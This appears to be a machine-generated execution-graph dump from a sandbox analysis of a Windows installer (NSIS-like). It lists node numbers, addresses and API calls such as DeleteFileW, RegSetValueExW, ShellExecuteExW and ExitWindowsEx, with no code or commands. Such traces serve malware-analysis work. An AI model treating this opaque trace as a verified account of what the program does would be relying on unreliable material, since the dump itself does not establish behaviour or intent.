                                                                                      Signature Coverage:14.9%
                                                                                      Total number of Nodes:1491
                                                                                      Total number of Limit Nodes:45
                                                                                      execution_graph 4838 10001000 4841 1000101b 4838->4841 4848 10001516 4841->4848 4843 10001020 4844 10001024 4843->4844 4845 10001027 GlobalAlloc 4843->4845 4846 1000153d 3 API calls 4844->4846 4845->4844 4847 10001019 4846->4847 4850 1000151c 4848->4850 4849 10001522 4849->4843 4850->4849 4851 1000152e GlobalFree 4850->4851 4851->4843 3809 401941 3810 401943 3809->3810 3811 402c37 17 API calls 3810->3811 3812 401948 3811->3812 3815 405990 3812->3815 3854 405c5b 3815->3854 3818 4059b8 DeleteFileW 3819 401951 3818->3819 3820 4059cf 3821 405aef 3820->3821 3868 406282 lstrcpynW 3820->3868 3821->3819 3886 4065c5 FindFirstFileW 3821->3886 3823 4059f5 3824 405a08 3823->3824 3825 4059fb lstrcatW 3823->3825 3869 405b9f lstrlenW 3824->3869 3826 405a0e 3825->3826 3830 405a1e lstrcatW 3826->3830 3832 405a29 lstrlenW FindFirstFileW 3826->3832 3830->3832 3831 405b18 3889 405b53 lstrlenW CharPrevW 3831->3889 3832->3821 3839 405a4b 3832->3839 3835 405ad2 FindNextFileW 3835->3839 3840 405ae8 FindClose 3835->3840 3836 405948 5 API calls 3838 405b2a 3836->3838 3841 405b44 3838->3841 3842 405b2e 3838->3842 3839->3835 3850 405a93 3839->3850 3873 406282 lstrcpynW 3839->3873 3840->3821 3844 4052e6 24 API calls 3841->3844 3842->3819 3845 4052e6 24 API calls 3842->3845 3844->3819 3847 405b3b 3845->3847 3846 405990 60 API calls 3846->3850 3849 406048 36 API calls 3847->3849 3848 4052e6 24 API calls 3848->3835 3852 405b42 3849->3852 3850->3835 3850->3846 3850->3848 3851 4052e6 24 API calls 3850->3851 3874 405948 3850->3874 3882 406048 MoveFileExW 3850->3882 3851->3850 3852->3819 3892 406282 lstrcpynW 3854->3892 3856 405c6c 3893 405bfe CharNextW CharNextW 3856->3893 3859 4059b0 3859->3818 3859->3820 3860 406516 5 API calls 3866 405c82 3860->3866 3861 405cb3 lstrlenW 3862 405cbe 3861->3862 3861->3866 3863 405b53 3 API calls 3862->3863 3865 405cc3 GetFileAttributesW 3863->3865 3864 4065c5 2 API calls 3864->3866 3865->3859 3866->3859 3866->3861 3866->3864 3867 405b9f 2 API calls 3866->3867 3867->3861 3868->3823 3870 405bad 3869->3870 3871 405bb3 CharPrevW 3870->3871 3872 405bbf 3870->3872 3871->3870 3871->3872 3872->3826 3873->3839 3899 405d4f GetFileAttributesW 3874->3899 3876 405975 3876->3850 3878 405963 RemoveDirectoryW 3880 405971 3878->3880 3879 40596b DeleteFileW 3879->3880 3880->3876 3881 405981 SetFileAttributesW 3880->3881 3881->3876 3883 406069 3882->3883 3884 40605c 3882->3884 3883->3850 3902 405ece 3884->3902 3887 405b14 3886->3887 3888 4065db FindClose 3886->3888 3887->3819 3887->3831 3888->3887 3890 405b1e 3889->3890 3891 405b6f lstrcatW 3889->3891 3890->3836 3891->3890 3892->3856 3894 405c1b 3893->3894 3898 405c2d 3893->3898 3896 405c28 CharNextW 3894->3896 3894->3898 3895 405c51 3895->3859 3895->3860 3896->3895 3897 405b80 CharNextW 3897->3898 3898->3895 3898->3897 3900 405d61 SetFileAttributesW 3899->3900 3901 405954 3899->3901 3900->3901 3901->3876 3901->3878 3901->3879 3903 405f24 GetShortPathNameW 3902->3903 3904 405efe 3902->3904 3906 406043 3903->3906 3907 405f39 3903->3907 3929 405d74 GetFileAttributesW CreateFileW 3904->3929 3906->3883 3907->3906 3909 405f41 wsprintfA 3907->3909 3908 405f08 CloseHandle GetShortPathNameW 3908->3906 3910 405f1c 3908->3910 3911 4062a4 17 API calls 3909->3911 3910->3903 3910->3906 3912 405f69 3911->3912 3930 405d74 GetFileAttributesW CreateFileW 3912->3930 3914 405f76 3914->3906 3915 405f85 GetFileSize GlobalAlloc 3914->3915 3916 405fa7 3915->3916 3917 40603c CloseHandle 3915->3917 3931 405df7 ReadFile 3916->3931 3917->3906 3922 405fc6 lstrcpyA 3925 405fe8 3922->3925 3923 405fda 3924 405cd9 4 API calls 3923->3924 3924->3925 3926 40601f SetFilePointer 3925->3926 3938 405e26 WriteFile 3926->3938 3929->3908 3930->3914 3932 405e15 3931->3932 3932->3917 3933 405cd9 lstrlenA 3932->3933 3934 405d1a lstrlenA 3933->3934 3935 405cf3 lstrcmpiA 3934->3935 3937 405d22 3934->3937 3936 405d11 CharNextA 3935->3936 3935->3937 3936->3934 3937->3922 3937->3923 3939 405e44 GlobalFree 3938->3939 3939->3917 3940 4015c1 3941 402c37 17 API calls 3940->3941 3942 4015c8 3941->3942 3943 405bfe 4 API calls 3942->3943 3956 4015d1 3943->3956 3944 401631 3946 401663 3944->3946 3947 401636 3944->3947 3945 405b80 CharNextW 3945->3956 3949 401423 24 API calls 3946->3949 3967 401423 3947->3967 3953 40165b 3949->3953 3955 40164a SetCurrentDirectoryW 3955->3953 3956->3944 3956->3945 3957 401617 GetFileAttributesW 3956->3957 3959 40584f 3956->3959 3962 4057b5 CreateDirectoryW 3956->3962 3971 405832 CreateDirectoryW 3956->3971 3957->3956 3974 40665c GetModuleHandleA 3959->3974 3963 405806 GetLastError 3962->3963 3964 405802 3962->3964 3963->3964 3965 405815 SetFileSecurityW 3963->3965 3964->3956 3965->3964 3966 40582b GetLastError 3965->3966 3966->3964 3968 4052e6 24 API calls 3967->3968 3969 401431 3968->3969 3970 406282 lstrcpynW 3969->3970 3970->3955 3972 405846 GetLastError 3971->3972 3973 405842 3971->3973 3972->3973 3973->3956 3975 406682 GetProcAddress 3974->3975 3976 406678 3974->3976 3977 405856 3975->3977 3980 4065ec GetSystemDirectoryW 3976->3980 3977->3956 3979 40667e 3979->3975 3979->3977 3981 40660e wsprintfW LoadLibraryExW 3980->3981 3981->3979 3986 401e43 3994 402c15 3986->3994 3988 401e49 3989 402c15 17 API calls 3988->3989 3990 401e55 3989->3990 3991 401e61 ShowWindow 3990->3991 3992 401e6c EnableWindow 3990->3992 3993 402abf 3991->3993 3992->3993 3995 4062a4 17 API calls 3994->3995 3996 402c2a 3995->3996 3996->3988 4852 401bc3 4853 401bcf 4852->4853 4856 402885 4852->4856 4857 406282 lstrcpynW 4853->4857 4855 401bd9 GlobalFree 4855->4856 4857->4855 4858 402644 4859 402c15 17 API calls 4858->4859 4866 402653 4859->4866 4860 402790 4861 40269d ReadFile 4861->4860 4861->4866 4862 405df7 ReadFile 4862->4866 4864 402792 4880 4061c9 wsprintfW 4864->4880 4865 4026dd MultiByteToWideChar 4865->4866 4866->4860 4866->4861 4866->4862 4866->4864 4866->4865 4868 402703 SetFilePointer MultiByteToWideChar 4866->4868 4869 4027a3 4866->4869 4871 405e55 SetFilePointer 4866->4871 4868->4866 4869->4860 4870 4027c4 SetFilePointer 4869->4870 4870->4860 4872 405e71 4871->4872 4877 405e8d 4871->4877 4873 405df7 ReadFile 4872->4873 4874 405e7d 4873->4874 4875 405e96 SetFilePointer 4874->4875 4876 405ebe SetFilePointer 4874->4876 4874->4877 4875->4876 4878 405ea1 4875->4878 4876->4877 4877->4866 4879 405e26 WriteFile 4878->4879 4879->4877 4880->4860 4007 402348 4008 402c37 17 API calls 4007->4008 4009 402357 4008->4009 4010 402c37 17 API calls 4009->4010 4011 402360 4010->4011 4012 402c37 17 API calls 4011->4012 4013 40236a GetPrivateProfileStringW 4012->4013 4048 4014cb 4049 4052e6 24 API calls 4048->4049 4050 4014d2 4049->4050 4881 4016cc 4882 402c37 17 API calls 4881->4882 4883 4016d2 GetFullPathNameW 4882->4883 4884 4016ec 4883->4884 4890 40170e 4883->4890 4887 4065c5 2 API calls 4884->4887 4884->4890 4885 401723 GetShortPathNameW 4886 402abf 4885->4886 4888 4016fe 4887->4888 4888->4890 4891 406282 lstrcpynW 4888->4891 4890->4885 4890->4886 4891->4890 4892 401b4d 4893 402c37 17 API calls 4892->4893 4894 401b54 4893->4894 4895 402c15 17 API calls 4894->4895 4896 401b5d wsprintfW 4895->4896 4897 402abf 4896->4897 4898 40394e 4899 403959 4898->4899 4900 403960 GlobalAlloc 4899->4900 4901 40395d 4899->4901 4900->4901 4902 401f52 4903 402c37 17 API calls 4902->4903 4904 401f59 4903->4904 4905 4065c5 2 API calls 4904->4905 4906 401f5f 4905->4906 4908 401f70 4906->4908 4909 4061c9 wsprintfW 4906->4909 4909->4908 4051 402253 4052 402c37 17 API calls 4051->4052 4053 402259 4052->4053 4054 402c37 17 API calls 4053->4054 4055 402262 4054->4055 4056 402c37 17 API calls 4055->4056 4057 40226b 4056->4057 4058 4065c5 2 API calls 4057->4058 4059 402274 4058->4059 4060 402285 lstrlenW lstrlenW 4059->4060 4064 402278 4059->4064 4061 4052e6 24 API calls 4060->4061 4063 4022c3 SHFileOperationW 4061->4063 4062 4052e6 24 API calls 4065 402280 4062->4065 4063->4064 4063->4065 4064->4062 4910 401956 4911 402c37 17 API calls 4910->4911 4912 40195d lstrlenW 4911->4912 4913 40258c 4912->4913 4066 4014d7 4067 402c15 17 API calls 4066->4067 4068 4014dd Sleep 4067->4068 4070 402abf 4068->4070 4914 401d57 GetDlgItem GetClientRect 4915 402c37 17 API calls 4914->4915 4916 401d89 LoadImageW SendMessageW 4915->4916 4917 401da7 DeleteObject 4916->4917 4918 402abf 4916->4918 4917->4918 4919 4022d7 4920 4022de 4919->4920 4923 4022f1 4919->4923 4921 4062a4 17 API calls 4920->4921 4922 4022eb 4921->4922 4924 4058e4 MessageBoxIndirectW 4922->4924 4924->4923 4925 402dd7 4926 402e02 4925->4926 4927 402de9 SetTimer 4925->4927 4928 402e57 4926->4928 4929 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4926->4929 4927->4926 4929->4928 4930 405259 4931 40526a 4930->4931 4932 40527e 4930->4932 4934 405270 4931->4934 4942 4052c7 4931->4942 4933 405286 IsWindowVisible 4932->4933 4939 40529d 4932->4939 4935 405293 4933->4935 4933->4942 4936 404263 SendMessageW 4934->4936 4943 404bb0 SendMessageW 4935->4943 4940 40527a 4936->4940 4937 4052cc CallWindowProcW 4937->4940 4939->4937 4948 404c30 4939->4948 4942->4937 4944 404bd3 GetMessagePos ScreenToClient SendMessageW 4943->4944 4945 404c0f SendMessageW 4943->4945 4946 404c07 4944->4946 4947 404c0c 4944->4947 4945->4946 4946->4939 4947->4945 4957 406282 lstrcpynW 4948->4957 4950 404c43 4958 4061c9 wsprintfW 4950->4958 4952 404c4d 4953 40140b 2 API calls 4952->4953 4954 404c56 4953->4954 4959 406282 lstrcpynW 4954->4959 4956 404c5d 4956->4942 4957->4950 4958->4952 4959->4956 4960 40525a 4961 40526a 4960->4961 4962 40527e 4960->4962 4964 405270 4961->4964 4965 4052c7 4961->4965 4963 405286 IsWindowVisible 4962->4963 4971 40529d 4962->4971 4963->4965 4966 405293 4963->4966 4967 404263 SendMessageW 4964->4967 4968 4052cc CallWindowProcW 4965->4968 4969 404bb0 5 API calls 4966->4969 4970 40527a 4967->4970 4968->4970 4969->4971 4971->4968 4972 404c30 4 API calls 4971->4972 4972->4965 4093 40175c 4094 402c37 17 API calls 4093->4094 4095 401763 4094->4095 4099 405da3 4095->4099 4097 40176a 4098 405da3 2 API calls 4097->4098 4098->4097 4100 405db0 GetTickCount GetTempFileNameW 4099->4100 4101 405de6 4100->4101 4102 405dea 4100->4102 4101->4100 4101->4102 4102->4097 4103 4023de 4104 402c37 17 API calls 4103->4104 4105 4023f0 4104->4105 4106 402c37 17 API calls 4105->4106 4107 4023fa 4106->4107 4120 402cc7 4107->4120 4110 402432 4111 40243e 4110->4111 4114 402c15 17 API calls 4110->4114 4115 40245d RegSetValueExW 4111->4115 4124 4030fa 4111->4124 4112 402885 4113 402c37 17 API calls 4116 402428 lstrlenW 4113->4116 4114->4111 4118 402473 RegCloseKey 4115->4118 4116->4110 4118->4112 4121 402ce2 4120->4121 4144 40611d 4121->4144 4126 403113 4124->4126 4125 403141 4148 403315 4125->4148 4126->4125 4151 40332b SetFilePointer 4126->4151 4130 4032ae 4133 4032f0 4130->4133 4136 4032b2 4130->4136 4131 40315e GetTickCount 4132 403298 4131->4132 4140 4031ad 4131->4140 4132->4115 4135 403315 ReadFile 4133->4135 4134 403315 ReadFile 4134->4140 4135->4132 4136->4132 4137 403315 ReadFile 4136->4137 4138 405e26 WriteFile 4136->4138 4137->4136 4138->4136 4139 403203 GetTickCount 4139->4140 4140->4132 4140->4134 4140->4139 4141 403228 MulDiv wsprintfW 4140->4141 4143 405e26 WriteFile 4140->4143 4142 4052e6 24 API calls 4141->4142 4142->4140 4143->4140 4145 40612c 4144->4145 4146 40240a 4145->4146 4147 406137 RegCreateKeyExW 4145->4147 4146->4110 4146->4112 4146->4113 4147->4146 4149 405df7 ReadFile 4148->4149 4150 40314c 4149->4150 4150->4130 4150->4131 4150->4132 4151->4125 4973 401de1 ReleaseDC 4974 402c15 17 API calls 4973->4974 4975 401df6 4974->4975 4976 4062a4 17 API calls 4975->4976 4977 401e33 CreateFontIndirectW 4976->4977 4978 40258c 4977->4978 4152 402862 4153 402c37 17 API calls 4152->4153 4154 402869 FindFirstFileW 4153->4154 4155 402891 4154->4155 4158 40287c 4154->4158 4160 4061c9 wsprintfW 4155->4160 4157 40289a 4161 406282 lstrcpynW 4157->4161 4160->4157 4161->4158 4979 401563 4980 402a65 4979->4980 4983 4061c9 wsprintfW 4980->4983 4982 402a6a 4983->4982 4984 404365 lstrlenW 4985 404384 4984->4985 4986 404386 WideCharToMultiByte 4984->4986 4985->4986 4987 401968 4988 402c15 17 API calls 4987->4988 4989 40196f 4988->4989 4990 402c15 17 API calls 4989->4990 4991 40197c 4990->4991 4992 402c37 17 API calls 4991->4992 4993 401993 lstrlenW 4992->4993 4994 4019a4 4993->4994 4997 4019e5 4994->4997 4999 406282 lstrcpynW 4994->4999 4996 4019d5 4996->4997 4998 4019da lstrlenW 4996->4998 4998->4997 4999->4996 5000 100018a9 5001 100018cc 5000->5001 5002 100018ff GlobalFree 5001->5002 5003 10001911 5001->5003 5002->5003 5004 10001272 2 API calls 5003->5004 5005 10001a87 GlobalFree GlobalFree 5004->5005 5006 4027e9 5007 4027f0 5006->5007 5008 402a6a 5006->5008 5009 402c15 17 API calls 5007->5009 5010 4027f7 5009->5010 5011 402806 SetFilePointer 5010->5011 5011->5008 5012 402816 5011->5012 5014 4061c9 wsprintfW 5012->5014 5014->5008 5015 40166a 5016 402c37 17 API calls 5015->5016 5017 401670 5016->5017 5018 4065c5 2 API calls 5017->5018 5019 401676 5018->5019 5020 401ced 5021 402c15 17 API calls 5020->5021 5022 401cf3 IsWindow 5021->5022 5023 401a20 5022->5023 4428 40176f 4429 402c37 17 API calls 4428->4429 4430 401776 4429->4430 4431 401796 4430->4431 4432 40179e 4430->4432 4468 406282 lstrcpynW 4431->4468 4469 406282 lstrcpynW 4432->4469 4435 4017a9 4437 405b53 3 API calls 4435->4437 4436 40179c 4439 406516 5 API calls 4436->4439 4438 4017af lstrcatW 4437->4438 4438->4436 4456 4017bb 4439->4456 4440 4065c5 2 API calls 4440->4456 4441 4017f7 4443 405d4f 2 API calls 4441->4443 4443->4456 4444 4017cd CompareFileTime 4444->4456 4445 40188d 4447 4052e6 24 API calls 4445->4447 4446 401864 4448 4052e6 24 API calls 4446->4448 4457 401879 4446->4457 4450 401897 4447->4450 4448->4457 4449 406282 lstrcpynW 4449->4456 4451 4030fa 31 API calls 4450->4451 4452 4018aa 4451->4452 4453 4018be SetFileTime 4452->4453 4455 4018d0 CloseHandle 4452->4455 4453->4455 4454 4062a4 17 API calls 4454->4456 4455->4457 4458 4018e1 4455->4458 4456->4440 4456->4441 4456->4444 4456->4445 4456->4446 4456->4449 4456->4454 4467 405d74 GetFileAttributesW CreateFileW 4456->4467 4470 4058e4 4456->4470 4459 4018e6 4458->4459 4460 4018f9 4458->4460 4461 4062a4 17 API calls 4459->4461 4462 4062a4 17 API calls 4460->4462 4463 4018ee lstrcatW 4461->4463 4464 401901 4462->4464 4463->4464 4466 4058e4 MessageBoxIndirectW 4464->4466 4466->4457 4467->4456 4468->4436 4469->4435 4471 4058f9 4470->4471 4472 405945 4471->4472 4473 40590d MessageBoxIndirectW 4471->4473 4472->4456 4473->4472 5024 402570 5025 402c37 17 API calls 5024->5025 5026 402577 5025->5026 5029 405d74 GetFileAttributesW CreateFileW 5026->5029 5028 402583 5029->5028 5030 401a72 5031 402c15 17 API calls 5030->5031 5032 401a78 5031->5032 5033 402c15 17 API calls 5032->5033 5034 401a20 5033->5034 5035 4024f2 5036 402c77 17 API calls 5035->5036 5037 4024fc 5036->5037 5038 402c15 17 API calls 5037->5038 5039 402505 5038->5039 5040 402521 RegEnumKeyW 5039->5040 5041 40252d RegEnumValueW 5039->5041 5043 402885 5039->5043 5042 402542 RegCloseKey 5040->5042 5041->5042 5042->5043 4474 403373 SetErrorMode GetVersion 4475 4033b2 4474->4475 4476 4033b8 4474->4476 4477 40665c 5 API calls 4475->4477 4478 4065ec 3 API calls 4476->4478 4477->4476 4479 4033ce lstrlenA 4478->4479 4479->4476 4480 4033de 4479->4480 4481 40665c 5 API calls 4480->4481 4482 4033e5 4481->4482 4483 40665c 5 API calls 4482->4483 4484 4033ec 4483->4484 4485 40665c 5 API calls 4484->4485 4486 4033f8 #17 OleInitialize SHGetFileInfoW 4485->4486 4565 406282 lstrcpynW 4486->4565 4489 403444 GetCommandLineW 4566 406282 lstrcpynW 4489->4566 4491 403456 GetModuleHandleW 4492 40346e 4491->4492 4493 405b80 CharNextW 4492->4493 4494 40347d CharNextW 4493->4494 4495 4035a7 GetTempPathW 4494->4495 4501 403496 4494->4501 4567 403342 4495->4567 4497 4035bf 4498 4035c3 GetWindowsDirectoryW lstrcatW 4497->4498 4499 403619 DeleteFileW 4497->4499 4502 403342 12 API calls 4498->4502 4577 402ec1 GetTickCount GetModuleFileNameW 4499->4577 4503 405b80 CharNextW 4501->4503 4507 403590 4501->4507 4510 403592 4501->4510 4505 4035df 4502->4505 4503->4501 4504 40362d 4508 4036d0 4504->4508 4512 405b80 CharNextW 4504->4512 4561 4036e0 4504->4561 4505->4499 4506 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4505->4506 4511 403342 12 API calls 4506->4511 4507->4495 4605 403990 4508->4605 4661 406282 lstrcpynW 4510->4661 4516 403611 4511->4516 4529 40364c 4512->4529 4516->4499 4516->4561 4517 40381a 4519 403822 GetCurrentProcess OpenProcessToken 4517->4519 4520 40389e ExitProcess 4517->4520 4518 4036fa 4521 4058e4 MessageBoxIndirectW 4518->4521 4522 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4519->4522 4523 40386e 4519->4523 4527 403708 ExitProcess 4521->4527 4522->4523 4528 40665c 5 API calls 4523->4528 4525 403710 4531 40584f 5 API calls 4525->4531 4526 4036aa 4530 405c5b 18 API calls 4526->4530 4533 403875 4528->4533 4529->4525 4529->4526 4534 4036b6 4530->4534 4532 403715 lstrcatW 4531->4532 4535 403731 lstrcatW lstrcmpiW 4532->4535 4536 403726 lstrcatW 4532->4536 4537 40388a ExitWindowsEx 4533->4537 4540 403897 4533->4540 4534->4561 4662 406282 lstrcpynW 4534->4662 4539 40374d 4535->4539 4535->4561 4536->4535 4537->4520 4537->4540 4542 403752 4539->4542 4543 403759 4539->4543 4673 40140b 4540->4673 4541 4036c5 4663 406282 lstrcpynW 4541->4663 4546 4057b5 4 API calls 4542->4546 4547 405832 2 API calls 4543->4547 4548 403757 4546->4548 4549 40375e SetCurrentDirectoryW 4547->4549 4548->4549 4550 403779 4549->4550 4551 40376e 4549->4551 4672 406282 lstrcpynW 4550->4672 4671 406282 lstrcpynW 4551->4671 4554 4062a4 17 API calls 4555 4037b8 DeleteFileW 4554->4555 4556 4037c5 CopyFileW 4555->4556 4560 403787 4555->4560 4556->4560 4557 40380e 4559 406048 36 API calls 4557->4559 4558 406048 36 API calls 4558->4560 4559->4561 4560->4554 4560->4557 4560->4558 4562 4062a4 17 API calls 4560->4562 4563 405867 2 API calls 4560->4563 4564 4037f9 CloseHandle 4560->4564 4664 4038b6 4561->4664 4562->4560 4563->4560 4564->4560 4565->4489 4566->4491 4568 406516 5 API calls 4567->4568 4570 40334e 4568->4570 4569 403358 4569->4497 4570->4569 4571 405b53 3 API calls 4570->4571 4572 403360 4571->4572 4573 405832 2 API calls 4572->4573 4574 403366 4573->4574 4575 405da3 2 API calls 4574->4575 4576 403371 4575->4576 4576->4497 4676 405d74 GetFileAttributesW CreateFileW 4577->4676 4579 402f01 4604 402f11 4579->4604 4677 406282 lstrcpynW 4579->4677 4581 402f27 4582 405b9f 2 API calls 4581->4582 4583 402f2d 4582->4583 4678 406282 lstrcpynW 4583->4678 4585 402f38 GetFileSize 4600 403034 4585->4600 4603 402f4f 4585->4603 4587 40303d 4589 40306d GlobalAlloc 4587->4589 4587->4604 4691 40332b SetFilePointer 4587->4691 4588 403315 ReadFile 4588->4603 4690 40332b SetFilePointer 4589->4690 4591 4030a0 4593 402e5d 6 API calls 4591->4593 4593->4604 4594 403056 4596 403315 ReadFile 4594->4596 4595 403088 4597 4030fa 31 API calls 4595->4597 4598 403061 4596->4598 4601 403094 4597->4601 4598->4589 4598->4604 4599 402e5d 6 API calls 4599->4603 4679 402e5d 4600->4679 4601->4601 4602 4030d1 SetFilePointer 4601->4602 4601->4604 4602->4604 4603->4588 4603->4591 4603->4599 4603->4600 4603->4604 4604->4504 4606 40665c 5 API calls 4605->4606 4607 4039a4 4606->4607 4608 4039bc 4607->4608 4610 4039aa 4607->4610 4609 406150 3 API calls 4608->4609 4611 4039ec 4609->4611 4700 4061c9 wsprintfW 4610->4700 4613 403a0b lstrcatW 4611->4613 4615 406150 3 API calls 4611->4615 4614 4039ba 4613->4614 4692 403c66 4614->4692 4615->4613 4618 405c5b 18 API calls 4619 403a3d 4618->4619 4620 403ad1 4619->4620 4622 406150 3 API calls 4619->4622 4621 405c5b 18 API calls 4620->4621 4623 403ad7 4621->4623 4624 403a6f 4622->4624 4625 403ae7 LoadImageW 4623->4625 4626 4062a4 17 API calls 4623->4626 4624->4620 4629 403a90 lstrlenW 4624->4629 4633 405b80 CharNextW 4624->4633 4627 403b8d 4625->4627 4628 403b0e RegisterClassW 4625->4628 4626->4625 4632 40140b 2 API calls 4627->4632 4630 403b44 SystemParametersInfoW CreateWindowExW 4628->4630 4631 403b97 4628->4631 4634 403ac4 4629->4634 4635 403a9e lstrcmpiW 4629->4635 4630->4627 4631->4561 4636 403b93 4632->4636 4638 403a8d 4633->4638 4637 405b53 3 API calls 4634->4637 4635->4634 4639 403aae GetFileAttributesW 4635->4639 4636->4631 4640 403c66 18 API calls 4636->4640 4641 403aca 4637->4641 4638->4629 4642 403aba 4639->4642 4643 403ba4 4640->4643 4701 406282 lstrcpynW 4641->4701 4642->4634 4645 405b9f 2 API calls 4642->4645 4646 403bb0 ShowWindow 4643->4646 4647 403c33 4643->4647 4645->4634 4649 4065ec 3 API calls 4646->4649 4648 4053b9 5 API calls 4647->4648 4650 403c39 4648->4650 4651 403bc8 4649->4651 4652 403c55 4650->4652 4653 403c3d 4650->4653 4654 403bd6 GetClassInfoW 4651->4654 4656 4065ec 3 API calls 4651->4656 4655 40140b 2 API calls 4652->4655 4653->4631 4659 40140b 2 API calls 4653->4659 4657 403c00 DialogBoxParamW 4654->4657 4658 403bea GetClassInfoW RegisterClassW 4654->4658 4655->4631 4656->4654 4660 40140b 2 API calls 4657->4660 4658->4657 4659->4631 4660->4631 4661->4507 4662->4541 4663->4508 4665 4038c0 CloseHandle 4664->4665 4666 4038ce 4664->4666 4665->4666 4706 4038fb 4666->4706 4669 405990 67 API calls 4670 4036e9 OleUninitialize 4669->4670 4670->4517 4670->4518 4671->4550 4672->4560 4674 401389 2 API calls 4673->4674 4675 401420 4674->4675 4675->4520 4676->4579 4677->4581 4678->4585 4680 402e66 4679->4680 4681 402e7e 4679->4681 4682 402e76 4680->4682 4683 402e6f DestroyWindow 4680->4683 4684 402e86 4681->4684 4685 402e8e GetTickCount 4681->4685 4682->4587 4683->4682 4686 406698 2 API calls 4684->4686 4687 402e9c CreateDialogParamW ShowWindow 4685->4687 4688 402ebf 4685->4688 4689 402e8c 4686->4689 4687->4688 4688->4587 4689->4587 4690->4595 4691->4594 4693 403c7a 4692->4693 4702 4061c9 wsprintfW 4693->4702 4695 403ceb 4703 403d1f 4695->4703 4697 403a1b 4697->4618 4698 403cf0 4698->4697 4699 4062a4 17 API calls 4698->4699 4699->4698 4700->4614 4701->4620 4702->4695 4704 4062a4 17 API calls 4703->4704 4705 403d2d SetWindowTextW 4704->4705 4705->4698 4707 403909 4706->4707 4708 4038d3 4707->4708 4709 40390e FreeLibrary GlobalFree 4707->4709 4708->4669 4709->4708 4709->4709 4710 401573 4711 401583 ShowWindow 4710->4711 4712 40158c 4710->4712 4711->4712 4713 40159a ShowWindow 4712->4713 4714 402abf 4712->4714 4713->4714 5045 404873 5046 404882 5045->5046 5076 404a21 5046->5076 5078 4058c8 GetDlgItemTextW 5046->5078 5048 4048a2 5051 405c5b 18 API calls 5048->5051 5049 40427e 8 API calls 5050 404a35 5049->5050 5052 4048a8 5051->5052 5079 406282 lstrcpynW 5052->5079 5054 4048bf 5055 40665c 5 API calls 5054->5055 5064 4048c6 5055->5064 5056 404907 5080 406282 lstrcpynW 5056->5080 5058 40490e 5059 405bfe 4 API calls 5058->5059 5060 404914 GetDiskFreeSpaceW 5059->5060 5062 404938 MulDiv 5060->5062 5065 40495f 5060->5065 5062->5065 5063 405b9f 2 API calls 5063->5064 5064->5056 5064->5063 5064->5065 5066 4049d0 5065->5066 5081 404b6b 5065->5081 5067 4049f3 5066->5067 5069 40140b 2 API calls 5066->5069 5092 404239 KiUserCallbackDispatcher 5067->5092 5069->5067 5072 4049d2 SetDlgItemTextW 5072->5066 5073 4049c2 5084 404aa2 5073->5084 5074 404a0f 5074->5076 5093 40463f 5074->5093 5076->5049 5078->5048 5079->5054 5080->5058 5082 404aa2 20 API calls 5081->5082 5083 4049bd 5082->5083 5083->5072 5083->5073 5085 404abb 5084->5085 5086 4062a4 17 API calls 5085->5086 5087 404b1f 5086->5087 5088 4062a4 17 API calls 5087->5088 5089 404b2a 5088->5089 5090 4062a4 17 API calls 5089->5090 5091 404b40 lstrlenW wsprintfW SetDlgItemTextW 5090->5091 5091->5066 5092->5074 5094 404652 SendMessageW 5093->5094 5095 40464d 5093->5095 5094->5076 5095->5094 5096 4014f5 SetForegroundWindow 5097 402abf 5096->5097 5098 100016b6 5099 100016e5 5098->5099 5100 10001b18 22 API calls 5099->5100 5101 100016ec 5100->5101 5102 100016f3 5101->5102 5103 100016ff 5101->5103 5104 10001272 2 API calls 5102->5104 5105 10001726 5103->5105 5106 10001709 5103->5106 5107 100016fd 5104->5107 5109 10001750 5105->5109 5110 1000172c 5105->5110 5108 1000153d 3 API calls 5106->5108 5112 1000170e 5108->5112 5111 1000153d 3 API calls 5109->5111 5113 100015b4 3 API calls 5110->5113 5111->5107 5114 100015b4 3 API calls 5112->5114 5115 10001731 5113->5115 5116 10001714 5114->5116 5117 10001272 2 API calls 5115->5117 5119 10001272 2 API calls 5116->5119 5118 10001737 GlobalFree 5117->5118 5118->5107 5120 1000174b GlobalFree 5118->5120 5121 1000171a GlobalFree 5119->5121 5120->5107 5121->5107 5122 401e77 5123 402c37 17 API calls 5122->5123 5124 401e7d 5123->5124 5125 402c37 17 API calls 5124->5125 5126 401e86 5125->5126 5127 402c37 17 API calls 5126->5127 5128 401e8f 5127->5128 5129 402c37 17 API calls 5128->5129 5130 401e98 5129->5130 5131 401423 24 API calls 5130->5131 5132 401e9f 5131->5132 5139 4058aa ShellExecuteExW 5132->5139 5134 401ee1 5135 40670d 5 API calls 5134->5135 5137 402885 5134->5137 5136 401efb CloseHandle 5135->5136 5136->5137 5139->5134 5140 10002238 5141 10002296 5140->5141 5143 100022cc 5140->5143 5142 100022a8 GlobalAlloc 5141->5142 5141->5143 5142->5141 4722 40167b 4723 402c37 17 API calls 4722->4723 4724 401682 4723->4724 4725 402c37 17 API calls 4724->4725 4726 40168b 4725->4726 4727 402c37 17 API calls 4726->4727 4728 401694 MoveFileW 4727->4728 4729 4016a0 4728->4729 4730 4016a7 4728->4730 4732 401423 24 API calls 4729->4732 4731 4065c5 2 API calls 4730->4731 4734 40224a 4730->4734 4733 4016b6 4731->4733 4732->4734 4733->4734 4735 406048 36 API calls 4733->4735 4735->4729 5144 401bfc 5145 4062a4 17 API calls 5144->5145 5146 401c07 5145->5146 5147 1000103d 5148 1000101b 5 API calls 5147->5148 5149 10001056 5148->5149 5150 401b7d 5154 401b7e 5150->5154 5151 4022de 5152 4062a4 17 API calls 5151->5152 5153 4022eb 5152->5153 5156 4058e4 MessageBoxIndirectW 5153->5156 5154->5151 5163 406282 lstrcpynW 5154->5163 5162 4022f1 5156->5162 5157 401ba4 5164 406282 lstrcpynW 5157->5164 5159 401bb3 5159->5151 5160 4029db 5159->5160 5165 406282 lstrcpynW 5160->5165 5163->5157 5164->5159 5165->5162 4736 40247e 4737 402c77 17 API calls 4736->4737 4738 402488 4737->4738 4739 402c37 17 API calls 4738->4739 4740 402491 4739->4740 4741 402885 4740->4741 4742 40249c RegQueryValueExW 4740->4742 4743 4024bc 4742->4743 4746 4024c2 RegCloseKey 4742->4746 4743->4746 4747 4061c9 wsprintfW 4743->4747 4746->4741 4747->4746 4822 4020fe 4823 402c37 17 API calls 4822->4823 4824 402105 4823->4824 4825 402c37 17 API calls 4824->4825 4826 40210f 4825->4826 4827 402c37 17 API calls 4826->4827 4828 402119 4827->4828 4829 402c37 17 API calls 